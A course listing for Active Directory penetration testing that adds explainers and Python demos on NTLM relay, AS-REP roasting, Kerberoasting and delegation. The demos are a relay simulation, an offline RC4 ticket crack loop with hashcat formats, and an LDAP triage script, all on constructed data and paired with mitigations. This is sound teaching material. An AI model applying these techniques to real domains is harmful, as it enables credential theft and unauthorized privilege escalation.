CyberGen LLC

Windows Active Directory (AD) has been center stage in most corporate infrastructure for decades, so it is crucial for security professionals to grasp the intricacies of, and the threats to, Windows infrastructures.

Active Directory Penetration Tests offer a better way for security experts to analyze and engage with the threats present in modern AD environments. This course, suitable for experienced pentesters and anyone interested in taking their pentesting to the next level, includes loads of detailed videos and thorough walkthroughs of attack scenarios and vectors, built upon extensive practical experience and dedicated research in compromising Windows AD ecosystems.

This course emulates real-world attack scenarios, beginning with an adversary that has nothing but network-level access and no Active Directory credentials, then obtaining an initial foothold, moving laterally within the network and escalating privileges to Enterprise Administrator level. The emphasis lies on abusing often-overlooked domain features rather than merely software vulnerabilities.

Key areas of focus include:

  • External OSINT

  • Initial Access via Kerberos-based Password Spray, Network Protocol Abuses, etc.

  • Active Directory Situational Awareness

  • Privilege Escalation via Kerberoasting, Kerberos Delegations, Access Control Lists, etc.

  • Persistence via Golden Ticket, Silver Ticket, Diamond Ticket, Sapphire Ticket, etc.

  • Abusing Active Directory Certificate Services (AD CS)

  • Domain and Forest Trust Abuses

  • Penetration Testing Report Writing


What's inside

Learning objectives

  • Overview of penetration testing, its limitations and some logistics in delivering a pentest engagement.
  • Deploy an Active Directory lab to execute attacks in a safe environment.
  • Master the fundamentals of Active Directory (AD).
  • Walk through the phases of the AD kill chain when conducting a Windows Active Directory penetration test.
  • Learn to use external OSINT as part of your internal AD penetration testing process.
  • Learn initial access techniques such as Kerberos-based password spray, NTLM relay, NBNS/LLMNR protocol abuse, AS-REP roasting, etc.
  • Learn network and domain enumeration techniques, both manually and semi-automatically using tools such as dig, nslookup, NetExec, BloodHound, etc.
  • Learn domain privilege escalation and lateral movement techniques by abusing the Kerberos protocol for attacks such as Kerberoasting, Kerberos delegations, etc.
  • Learn domain privilege escalation and lateral movement techniques by abusing misconfigured Active Directory access control lists (ACLs).
  • Learn domain privilege escalation and lateral movement techniques by abusing general misconfigurations and poor AD user habits.
  • Abuse misconfigured Active Directory Certificate Services for privilege escalation and domain dominance.
  • Learn domain persistence techniques such as Golden Ticket, Silver Ticket, Diamond Ticket and Sapphire Ticket.
  • Explore advanced techniques in cross-domain and cross-forest attacks such as SID filtering bypass, etc.
  • Write a penetration testing report that will help your client prioritize and address discovered attack vectors and vulnerabilities.

Syllabus

Module 00 : Welcome
Welcome!
whoami
Why This Course?

Extra resource if you are inclined to build your own lab:

https://github.com/Orange-Cyberdefense/GOAD?tab=readme-ov-file

NTLM Authentication Process

  1. Client Request: The client (e.g., a user's computer) sends a NEGOTIATE message to the server to start authentication.

  2. Server Challenge: The server replies with a CHALLENGE message containing a random 8-byte nonce.

  3. Client Response: The client computes a response over the challenge using a key derived from the user's password hash (an HMAC-MD5 in NTLMv2) and sends it in the AUTHENTICATE message. The password hash itself never crosses the wire.

  4. Server Verification: Nothing is decrypted. The server (or, for domain accounts, the domain controller via Netlogon pass-through) recomputes the expected response from the stored password hash and compares it with the one received. If they match, authentication succeeds.

NTLM-Relay Attack Process

  1. Intercept Authentication: The attacker gets a victim client to authenticate to a host they control, for example by poisoning LLMNR/NBNS name lookups or coercing a server to authenticate to them, which puts the attacker between the client and the target server (Man-in-the-Middle position).

  2. Initiate Connection: The attacker opens its own connection to the target server and forwards the client's NEGOTIATE message, so the target believes the victim is connecting.

  3. Relay Challenge: The attacker relays the target server's challenge to the victim client.

  4. Client Response: The victim client computes the response with its password hash and sends it to the attacker, believing the attacker is the server.

  5. Relay Response: The attacker relays the client's response unchanged to the target server.

  6. Gain Access: The server verifies the response and grants the attacker's connection a session as the victim user. The attacker never learns the password or its hash, only the authenticated session, which is why the technique works even against strong passwords.

Mitigation Steps

  • Require SMB Signing: Signing binds each SMB message to the session key derived during authentication. A relaying attacker obtains the session but never the key, so it cannot sign, and a server that requires signing drops the relayed session. Note that "enabled" is not enough: unless signing is required on the server, an attacker-negotiated session simply goes unsigned. Historically, workstations and member servers did not require it by default; domain controllers did.

  • Use Extended Protection for Authentication (EPA): Channel binding ties the NTLM response to the TLS channel it was sent over, so a response captured on one connection cannot be replayed over another (HTTPS web applications, LDAPS).

  • Require LDAP Signing and LDAP Channel Binding on Domain Controllers: SMB is not the only relay target. Relaying to LDAP/LDAPS on a domain controller lets the attacker modify directory objects as the victim (for example, granting itself resource-based constrained delegation), and historically neither setting was enforced by default.
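The two exchanges above, worked through as an added example (this is not code from the course or from any tool it teaches): a client computes an NTLMv2 response as MS-NLMP specifies, a server verifies it by recomputation rather than decryption, and a relaying attacker forwards the messages between the two. The user name, domain, NT hash and the single-process "network" of function calls are constructed for the example, and SMB signing is simplified to an HMAC with the session key, whereas real SMB2 derives a separate signing key from it.

```python
"""NTLMv2 challenge/response and NTLM relay, modelled in pure Python.

Added example (not part of the course). Hash usage, response and session-key
derivation follow MS-NLMP; client, attacker and server talk via function calls,
and signing is reduced to an HMAC over the request with the session key.
"""
import hashlib
import hmac
import os

# NT hash of the constructed sample password "password" (MD4 of its UTF-16LE form).
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def ntlmv2_response(nthash, user, domain, server_challenge, client_challenge,
                    timestamp=b"\x00" * 8, av_pairs=b""):
    """Return (NtChallengeResponse, SessionBaseKey) exactly as a client computes them."""
    # NTOWFv2: the NT hash is only ever used as an HMAC key, never transmitted.
    key = hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    temp = (b"\x01\x01" + b"\x00" * 6 + timestamp + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_key = hmac.new(key, proof, hashlib.md5).digest()
    return proof + temp, session_key


class Client:
    def __init__(self, user, domain, nthash):
        self.user, self.domain, self.nthash, self.session_key = user, domain, nthash, None

    def respond(self, server_challenge):
        resp, self.session_key = ntlmv2_response(
            self.nthash, self.user, self.domain, server_challenge, os.urandom(8))
        return self.user, self.domain, resp

    def sign(self, message):
        return hmac.new(self.session_key, message, hashlib.md5).digest()


class Server:
    def __init__(self, accounts, require_signing):
        self.accounts = accounts          # user -> stored NT hash (what a DC holds)
        self.require_signing = require_signing
        self.sessions = {}                # session id -> session key
        self._challenge = None

    def challenge(self):
        self._challenge = os.urandom(8)
        return self._challenge

    def authenticate(self, user, domain, response):
        """Step 4 of the handshake: recompute the expected proof; nothing is decrypted."""
        proof, temp = response[:16], response[16:]
        key = hmac.new(self.accounts[user], (user.upper() + domain).encode("utf-16-le"),
                       hashlib.md5).digest()
        expected = hmac.new(key, self._challenge + temp, hashlib.md5).digest()
        if not hmac.compare_digest(proof, expected):
            return None
        sid = os.urandom(4).hex()
        self.sessions[sid] = hmac.new(key, proof, hashlib.md5).digest()
        return sid

    def request(self, sid, message, signature):
        if self.require_signing:
            expected = hmac.new(self.sessions[sid], message, hashlib.md5).digest()
            if signature is None or not hmac.compare_digest(signature, expected):
                return "rejected: signing required and signature missing or invalid"
        return "ok: " + message.decode()


def legitimate_login(client, server):
    user, domain, resp = client.respond(server.challenge())
    sid = server.authenticate(user, domain, resp)
    return server.request(sid, b"tree connect", client.sign(b"tree connect"))


def relay(victim, target):
    """Attacker in the middle: victim thinks it talks to a server, target thinks it talks to the victim."""
    chal = target.challenge()                      # attacker opens its own session to the target
    user, domain, resp = victim.respond(chal)      # target's challenge relayed; victim answers it
    sid = target.authenticate(user, domain, resp)  # victim's answer relayed unchanged
    if sid is None:
        return "authentication failed"
    # The attacker holds a session as the victim but never saw the NT hash or the
    # session key, so it cannot sign: if signing is required the session is useless.
    return target.request(sid, b"tree connect", signature=None)


def run(require_signing):
    """Return (legitimate result, relayed result) against a target with the given signing policy."""
    alice = Client("alice", "CORP", NT_HASH)
    target = Server({"alice": NT_HASH}, require_signing)
    return legitimate_login(alice, target), relay(alice, target)


if __name__ == "__main__":
    print("signing not required:", run(False))
    print("signing required:   ", run(True))
```

With signing not required the relayed session is accepted; with signing required the server rejects the attacker's request, because only parties that know the NT hash (the client and the verifier) can derive the session key. The same property is why a captured response cannot simply be replayed later: it is bound to the server's one-time challenge.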

AS-REP Roasting targets accounts that have Kerberos pre-authentication disabled. For such accounts the KDC answers an AS-REQ from anyone, and its reply contains data encrypted with a key derived from the account's password, which can then be cracked offline.

AS-REP Roasting Attack

  1. Reconnaissance: The attacker identifies accounts with Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl). With a valid domain account this is an LDAP query; without one, the attacker can still try a list of usernames, because the KDC's error codes reveal whether each account exists and whether it requires pre-authentication.

  2. Send AS-REQ: The attacker sends an Authentication Server Request (AS-REQ) for the target account to the Domain Controller, without the encrypted timestamp that pre-authentication would require.

  3. Receive AS-REP: The Domain Controller responds with an Authentication Server Response (AS-REP) containing the Ticket Granting Ticket (TGT), which is encrypted with the krbtgt key and useless to the attacker, and an encrypted part (enc-part) encrypted with the user's key.

  4. Extract and Crack: The attacker extracts the enc-part and cracks it offline (hashcat mode 18200 for RC4, etype 23). No password hash is ever sent; the attacker recovers the password by guessing it and checking each guess against the enc-part.

Mitigation Steps

  • Enable Kerberos Pre-Authentication: Ensure that Kerberos pre-authentication is enabled for all accounts, and audit for accounts where it has been switched off, often to accommodate legacy non-Windows Kerberos clients.

  • Prefer AES over RC4: If an account must keep pre-authentication disabled, make sure it supports only AES encryption types; AES-encrypted AS-REPs are far slower to crack than RC4 ones.

  • Monitor: Event ID 4768 with Pre-Authentication Type 0 on domain controllers records AS-REQs that skipped pre-authentication.

Extra resource on relay attacks using IPv6 (mitm6):

https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/

Kerberoasting targets service accounts. Any authenticated domain user can request a service ticket for any registered Service Principal Name (SPN), and the ticket is encrypted with the key of the account that owns the SPN, so it can be cracked offline to recover that account's password.

  1. Reconnaissance: The attacker identifies user accounts with SPNs set in Active Directory. Computer accounts also have SPNs but are not worth roasting, since their passwords are long, random and rotated automatically.

  2. Request Service Ticket: The attacker, using any authenticated domain user, requests a service ticket for the target SPN (a TGS-REQ to the Domain Controller, answered by a TGS-REP). Requesting RC4 (etype 23) where the DC still allows it makes cracking much cheaper.

  3. Extract Ticket: The attacker extracts the encrypted ticket from the TGS-REP.

  4. Crack Offline: The ticket is cracked against a word list (hashcat mode 13100 for RC4); a weak service account password falls in minutes.

Mitigation Steps

  • Use Group Managed Service Accounts (gMSA): their passwords are long, random and rotated automatically by AD, which makes cracking infeasible. Note that enabling pre-authentication does not help here: the attacker is already an authenticated user, and service ticket requests do not involve pre-authentication.

  • Monitor for Suspicious Activity: On domain controllers, Event ID 4769 records service ticket requests; many requests for distinct SPNs from one user in a short time, especially with RC4 (0x17) encryption, is the classic Kerberoasting signature.

  • Use Strong Passwords: Where a gMSA is not possible, enforce long (25+ characters), random passwords for service accounts, and restrict the account to AES encryption types (msDS-SupportedEncryptionTypes) so that RC4 tickets cannot be requested for it.

  • Limit SPN Assignment: Only assign SPNs to accounts that absolutely need them, never to privileged accounts such as Domain Admins, and regularly review and remove unnecessary SPNs.
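What the two roasting attacks actually hand the attacker, as an added example that is not part of the course: the NT hash derivation, Kerberos RC4-HMAC (etype 23) as the KDC applies it to an AS-REP encrypted part and to a service ticket, the hashcat input lines for both, and the offline crack loop they share. The accounts, passwords, word list and the stand-in plaintexts are constructed (a real KDC encrypts ASN.1 structures, not these strings). MD4 is written out because OpenSSL 3 ships it only in the legacy provider, so hashlib.new("md4") fails on many systems.

```python
"""AS-REP roasting and Kerberoasting: the blob, the formats, and the crack loop.

Added example, not course code. Accounts, passwords, word list and the
stand-in plaintexts are constructed. Key usages follow RFC 4757.
"""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
AS_REP_ENC_PART, TICKET_ENC_PART = 8, 2  # RFC 4757 usages (RFC 4120 usage 3 for the AS-REP part maps to 8)
WORDLIST = ["Welcome1", "Summer2024!", "password", "P@ssw0rd"]  # constructed


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, order, s in rounds:
            for i, idx in enumerate(order):
                t = (a + f(b, c, d) + x[idx] + k) & MASK
                a, b, c, d = d, ((t << s[i % 4]) | (t >> (32 - s[i % 4]))) & MASK, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """Kerberos etype 23 as the KDC applies it: HMAC-MD5 checksum, then RC4 (RFC 4757 section 5)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = os.urandom(8) + plaintext                     # 8-byte confounder
    checksum = hmac.new(k1, data, hashlib.md5).digest()  # K2 == K1 for this etype
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_try_key(key: bytes, usage: int, blob: bytes):
    """Decrypt under a candidate key; the checksum tells us whether the guess was right."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum, ciphertext = blob[:16], blob[16:]
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), ciphertext)
    ok = hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)
    return data[8:] if ok else None


def crack(blob: bytes, usage: int, wordlist):
    """The offline step both attacks share: one MD4 and one RC4 per guess, no traffic to the DC."""
    for candidate in wordlist:
        if rc4_hmac_try_key(nt_hash(candidate), usage, blob) is not None:
            return candidate
    return None


def asrep_line(user, domain, blob):  # hashcat mode 18200
    return f"$krb5asrep$23${user}@{domain}:{blob[:16].hex()}${blob[16:].hex()}"


def tgs_line(user, domain, spn, blob):  # hashcat mode 13100
    return f"$krb5tgs$23$*{user}${domain}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def demo():
    """Returns (AS-REP roast result, Kerberoast result, hashcat lines) for the constructed accounts."""
    # bob has pre-auth disabled: the KDC encrypts the AS-REP enc-part with bob's key for whoever asks.
    asrep = rc4_hmac_encrypt(nt_hash("password"), AS_REP_ENC_PART, b"EncASRepPart: session key, flags, times")
    # svc_sql owns an SPN: any domain user gets a ticket encrypted with svc_sql's key.
    tgs = rc4_hmac_encrypt(nt_hash("Summer2024!"), TICKET_ENC_PART, b"EncTicketPart: session key, PAC")
    lines = (asrep_line("bob", "CORP.LOCAL", asrep),
             tgs_line("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", tgs))
    return crack(asrep, AS_REP_ENC_PART, WORDLIST), crack(tgs, TICKET_ENC_PART, WORDLIST), lines


if __name__ == "__main__":
    print(demo())
```

The crack loop is the whole reason both attacks work: the only secret is the account password, and each guess costs one MD4 and one RC4, which is why RC4 tickets crack so quickly and why the AES mitigation above matters (AES keys are derived with PBKDF2 over thousands of iterations). Note that the blob is cracked, not "decrypted": a wrong guess simply fails the checksum.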

Kerberos Delegation

  • Kerberos Delegation Purpose: Allows a service to request tickets or perform actions on behalf of a user while preserving authentication and authorization: the back-end service sees the user's identity, not the front-end service's.

  • Types of Delegation:

    • Unconstrained Delegation (TRUSTED_FOR_DELEGATION on the account): users who authenticate to the service send along a forwardable TGT, which the host caches. The service can then impersonate that user to any service on any server, and an attacker who compromises the host (or coerces a privileged account, such as a domain controller, into authenticating to it) obtains those TGTs.

    • Constrained Delegation (msDS-AllowedToDelegateTo on the front-end account): limits delegation to the listed services (S4U2Proxy). With protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) the service can also obtain tickets for any user without that user ever authenticating to it (S4U2Self), which makes compromising such an account especially valuable.

    • Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity on the back-end resource): the resource, not the front end, lists which accounts may delegate to it, so whoever can write that attribute on a computer object (for example through GenericWrite granted by a misconfigured ACL) can grant themselves delegation to that host.

  • Use Cases: Commonly used when an application, such as a web server, needs to access resources hosted on a different server, such as a SQL database, as the logged-in user.

  • Security: Facilitates secure, seamless interactions between services on behalf of users, but every delegation setting is also an impersonation path. Treat accounts trusted for delegation as highly privileged and review them regularly.
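The reconnaissance steps of AS-REP roasting and Kerberoasting and the three delegation types above all come down to reading a handful of attributes that any domain user can query over LDAP. As an added example (not the course's own tooling), the function below triages an already-fetched directory export: the entries, account names and flag values are a constructed sample, the security descriptor for RBCD is a placeholder, and a real run would feed it the results of an LDAP search made with a low-privileged domain account.

```python
# Added example: triage LDAP results for roastable and delegation-enabled accounts.
# Flag values are the documented userAccountControl bits; the entries are constructed.
ACCOUNTDISABLE = 0x0002
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

SAMPLE_ENTRIES = [  # constructed sample of what a search over user and computer objects returns
    {"sAMAccountName": "bob", "objectClass": ["user"], "userAccountControl": 0x400200},
    {"sAMAccountName": "svc_sql", "objectClass": ["user"], "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "old_svc", "objectClass": ["user"], "userAccountControl": 0x400202,
     "servicePrincipalName": ["HTTP/legacy.corp.local"]},
    {"sAMAccountName": "krbtgt", "objectClass": ["user"], "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WEB01$", "objectClass": ["computer"], "userAccountControl": 0x81000},
    {"sAMAccountName": "APP01$", "objectClass": ["computer"], "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["CIFS/fs01.corp.local"]},
    {"sAMAccountName": "FS02$", "objectClass": ["computer"], "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<security descriptor placeholder>"},
]


def triage(entries):
    """Map each entry to the attack it enables; disabled accounts are skipped."""
    findings = {"asrep_roast": [], "kerberoast": [], "unconstrained": [],
                "constrained": [], "rbcd_targets": []}
    for e in entries:
        name, uac = e["sAMAccountName"], e.get("userAccountControl", 0)
        if uac & ACCOUNTDISABLE:
            continue  # a disabled account can neither authenticate nor be impersonated
        if uac & DONT_REQ_PREAUTH:
            findings["asrep_roast"].append(name)
        spns = e.get("servicePrincipalName", [])
        # Roast user accounts only: machine passwords are long and random, and krbtgt is disabled anyway.
        if spns and "computer" not in e["objectClass"] and name.lower() != "krbtgt":
            findings["kerberoast"].append((name, spns[0]))
        if uac & TRUSTED_FOR_DELEGATION:  # domain controllers carry this flag legitimately; anything else is a finding
            findings["unconstrained"].append(name)
        targets = e.get("msDS-AllowedToDelegateTo")
        if targets:
            # With protocol transition the account can mint tickets for any user to these targets (S4U2Self + S4U2Proxy).
            mode = "protocol transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "kerberos only"
            findings["constrained"].append((name, targets, mode))
        if e.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            findings["rbcd_targets"].append(name)  # whoever the descriptor names can impersonate users to this host
    return findings


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_ENTRIES).items():
        print(f"{kind}: {hits}")
```

In the sample, old_svc has both pre-authentication disabled and an SPN but is disabled, so it is correctly left out; APP01$ is flagged as the higher-value constrained target because protocol transition lets it obtain tickets for arbitrary users. BloodHound and NetExec derive their "AS-REP roastable", "Kerberoastable" and delegation edges from exactly these attributes.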

Traffic lights

Read about what's good, what should give you pause, and possible dealbreakers:
Emulates real-world attack scenarios, starting with minimal access and escalating to Enterprise Administrator, reflecting practical pentesting engagements
Covers advanced techniques in cross-domain and cross-forest attacks, such as SID filtering bypass, which are crucial for comprehensive security assessments
Focuses on abusing often-overlooked domain features rather than software vulnerabilities, providing a unique and practical approach to AD penetration testing
Requires deploying an Active Directory lab, which may require additional hardware and software resources beyond a typical home or library setup
Includes penetration testing report writing, which is essential for communicating findings and recommendations to clients in a professional manner
Explores domain persistence techniques like Golden, Silver, Diamond, and Sapphire Tickets, which are critical for understanding advanced attack vectors


Reviews summary

Advanced Windows AD pentesting analysis

According to learners, this course on Advanced Windows Active Directory Penetration Testing offers a deep dive into practical AD attack techniques. Students frequently highlight the realistic labs and hands-on exercises as a major strength, praising the coverage of cutting-edge methods like Kerberoasting, ACL abuses, and various ticket attacks. While many find the instructor knowledgeable and the content comprehensive, some note that the course requires significant prerequisites and can be challenging without a solid foundation in networking and basic AD concepts. The detailed walkthroughs and tool demonstrations are often mentioned as particularly useful.
Techniques reflect current practices.
"The techniques and tools covered feel current and relevant to modern Active Directory environments."
"I appreciate that the course focuses on abusing features rather than just vulnerabilities, reflecting real-world attacks."
"The methods taught are highly applicable to contemporary penetration testing engagements."
Instructor demonstrates expertise.
"The instructor clearly knows their stuff and provides valuable insights throughout the modules."
"His explanations of complex topics were generally clear and easy to follow."
"I felt confident in the material being taught due to the instructor's evident expertise in the field."
Covers advanced attack vectors in depth.
"The technical depth of this course is impressive. It goes beyond the basics and dives into sophisticated AD attacks."
"I learned about many lesser-known AD attack techniques and how to practically execute them."
"The coverage of Kerberos attacks, ACLs, and ticket attacks was thorough and highly relevant."
"This course provided the advanced knowledge I was seeking to elevate my AD penetration testing skills."
Emphasis on realistic, hands-on practice.
"The hands-on labs were incredibly valuable, allowing me to practice real-world attack scenarios in a safe environment."
"Setting up the lab environment was challenging but essential. The exercises cover highly relevant techniques."
"I really appreciated the practical nature of the course. Doing the attacks myself helped solidify the concepts."
"Learning by doing is key in pentesting, and the course provides ample opportunity for that with its lab exercises."
Challenges in setting up the lab.
"Setting up the lab environment was the most frustrating part for me. It took significant time and troubleshooting."
"The lab setup instructions could be clearer, or perhaps provide pre-built VMs to reduce friction."
"Getting the lab environment to work correctly was a hurdle before I could even start the practical exercises."
Needs solid foundational knowledge.
"This course is definitely for experienced pentesters. Without a strong AD and networking background, you might struggle."
"While the course is excellent, I found myself needing to pause and research prerequisite topics frequently."
"As an intermediate learner, some parts moved quite quickly and assumed prior knowledge I didn't fully have."
"Ensure you have a solid grasp of Windows, AD fundamentals, and basic pentesting concepts before starting."

Activities

Be better prepared before your course. Deepen your understanding during and after it. Supplement your coursework and achieve mastery of the topics covered in Advanced Windows Active Directory Penetration Testing with these activities:
Review Kerberos Authentication
Solidify your understanding of Kerberos authentication to better grasp privilege escalation and lateral movement techniques.
  • Read articles and documentation on Kerberos.
  • Watch videos explaining Kerberos concepts.
  • Complete a practice quiz on Kerberos.
Review Active Directory Fundamentals
Strengthen your understanding of Active Directory concepts to better understand attack vectors.
  • Review the structure of Active Directory domains.
  • Study the roles of domain controllers.
  • Understand Group Policy Objects (GPOs).
Read 'Active Directory Pentesting'
Gain practical insights into real-world Active Directory penetration testing scenarios.
  • Read the book cover to cover.
  • Take notes on key concepts and techniques.
  • Attempt to replicate some of the attacks in a lab environment.
Practice Password Spraying
Reinforce your skills in password spraying techniques against a lab environment.
  • Set up a lab environment with Active Directory.
  • Use tools like Kerbrute to perform password spraying.
  • Analyze the results and identify successful logins.
Build an AD Pentesting Lab
Create a fully functional Active Directory lab environment to practice penetration testing techniques.
  • Choose a virtualization platform (e.g., VMware, VirtualBox).
  • Install Windows Server and configure Active Directory.
  • Populate the lab with users, groups, and resources.
  • Harden the lab environment and document the configurations.
Document Attack Paths
Create a detailed diagram and write-up of potential attack paths within a sample Active Directory environment.
  • Design a sample Active Directory environment.
  • Identify potential vulnerabilities and misconfigurations.
  • Map out possible attack paths using tools like BloodHound.
  • Write a report detailing the attack paths and potential impact.
Read 'Active Directory Security'
Deepen your understanding of Active Directory security best practices and vulnerabilities.
  • Read the book cover to cover.
  • Take notes on key security concepts and configurations.
  • Implement some of the security measures in your lab environment.

Career center

Learners who complete Advanced Windows Active Directory Penetration Testing will develop knowledge and skills that may be useful to these careers:
Penetration Tester
A Penetration Tester identifies and exploits vulnerabilities in systems and networks. This course on Windows Active Directory Penetration Testing directly aligns with the responsibilities of a penetration tester. The course provides understanding of Active Directory, deployment of a lab, and how to execute attacks in a safe environment. With lessons in external open source intelligence, initial access strategies such as Kerberos-based password spray, network protocol abuses, and privilege escalation techniques, this course helps those who want to find creative vectors of attack. A penetration tester will find immense value in learning how to write reports that help clients prioritize and address discovered attack vectors and vulnerabilities.
Red Team Operator
A Red Team Operator simulates real-world attacks to test an organization's security defenses. This "Advanced Windows Active Directory Penetration Testing" course is highly relevant for red team members. The course focuses on emulating real-world attack scenarios, starting with minimal network access and escalating privileges to the Enterprise Administrator level. The course emphasizes abusing often-overlooked domain features. A red team operator would benefit from the practical, hands-on approach to compromising Windows Active Directory ecosystems that this course provides.
Vulnerability Analyst
Vulnerability Analysts identify weaknesses in systems and applications. This course on Windows Active Directory Penetration Testing provides a thorough understanding of Active Directory vulnerabilities and how to exploit them. The course offers detailed videos and walkthroughs of attack scenarios and vectors. By learning initial access techniques, privilege escalation methods, and domain persistence strategies, a vulnerability analyst can enhance their ability to identify and assess risks. Modules on abusing Active Directory Certificate Services and domain trust abuses are directly applicable to vulnerability assessment tasks.
Security Consultant
Security Consultants advise organizations on how to improve their security posture. This course on Windows Active Directory Penetration Testing helps a security consultant understand the intricacies and threats associated with Windows infrastructures. The course emphasizes emulating real-world attack scenarios, starting with minimal access and escalating privileges to the Enterprise Administrator level. Given lessons in abusing often-overlooked domain features and penetration testing report writing, this course prepares a security consultant to identify vulnerabilities, propose solutions, and communicate security risks effectively to clients.
Information Security Analyst
Information Security Analysts protect an organization's computer systems and networks from cyber threats. This course on Windows Active Directory Penetration Testing offers a deep dive into the techniques used to compromise Active Directory environments. The course provides a comprehensive understanding of Active Directory kill chain phases. By learning topics ranging from initial access techniques to domain persistence, the information security analyst can gain practical skills in identifying, preventing, and responding to attacks. Course modules on privilege escalation via Kerberoasting, Kerberos delegations, and access control lists will be particularly useful to the analyst.
Security Engineer
Security Engineers design, implement, and manage security systems. This course on Windows Active Directory Penetration Testing offers valuable insight into how Active Directory environments are compromised. The course covers key areas such as external OSINT, privilege escalation, and persistence techniques. By understanding these attack vectors, a security engineer can design more robust and effective security measures. Modules on abusing Active Directory Certificate Services and on domain and forest trust abuses are particularly relevant for engineers focused on hardening Active Directory environments.
Cybersecurity Specialist
Cybersecurity Specialists focus on protecting computer systems and data from cyber threats. This course on Windows Active Directory Penetration Testing is highly relevant. The course provides comprehensive knowledge of Active Directory attack scenarios. The course emphasizes often-overlooked domain features. By taking this course, a cybersecurity specialist will be better equipped to identify, prevent, and respond to attacks on Active Directory environments. The modules on persistence techniques are especially useful for understanding how attackers maintain access.
IT Auditor
An IT Auditor evaluates an organization's IT infrastructure and controls to ensure compliance and security. This course on Windows Active Directory Penetration Testing provides an understanding of common attack vectors and vulnerabilities within Active Directory. The course teaches to emulate real-world attack scenarios. By learning about initial access techniques, privilege escalation methods, and domain persistence strategies, an IT auditor becomes better equipped to assess an organization's security posture. Modules on domain trust abuses help the auditor evaluate the effectiveness of existing security controls.
Network Security Engineer
Network Security Engineers protect an organization's network infrastructure from unauthorized access and cyber threats. This course on Windows Active Directory Penetration Testing is useful because it covers network-level access exploitation and lateral movement within a network. The course also highlights using Network and Domain Enumeration techniques, both manually and semi-automatically using tools such as Dig, Nslookup, NetExec, BloodHound, etc. A network security engineer can apply this training to enhance their understanding of network vulnerabilities and how to defend against them.
System Administrator
System Administrators manage and maintain computer systems, including Active Directory environments. This course on Windows Active Directory Penetration Testing is useful by providing a defensive perspective. The course outlines how attackers exploit Active Directory vulnerabilities, emphasizing often-overlooked domain features. System administrators can use this knowledge to proactively identify and remediate potential security weaknesses within their Active Directory infrastructure. Modules on Active Directory Certificate Services will improve security configuration.
Incident Responder
Incident Responders manage and contain security breaches. This course on Windows Active Directory Penetration Testing may be relevant by providing insights into the attack techniques used to compromise Active Directory environments. The course covers a range of attack scenarios. By learning about initial access, privilege escalation, and persistence, an incident responder can better understand how attackers operate, contain breaches, and prevent future incidents. The modules detailing persistence techniques can be particularly valuable.
Digital Forensics Analyst
Digital Forensics Analysts investigate cyber incidents to determine the cause and scope of the breach. This course on Windows Active Directory Penetration Testing may be useful by providing insights into attacker techniques and methodologies used in Active Directory environments. The course covers a wide range of attack scenarios, including initial access, privilege escalation, and persistence. A forensics analyst will find the course relevant when analyzing compromised systems. This course is useful in understanding how attackers operate within a network.
Cloud Security Engineer
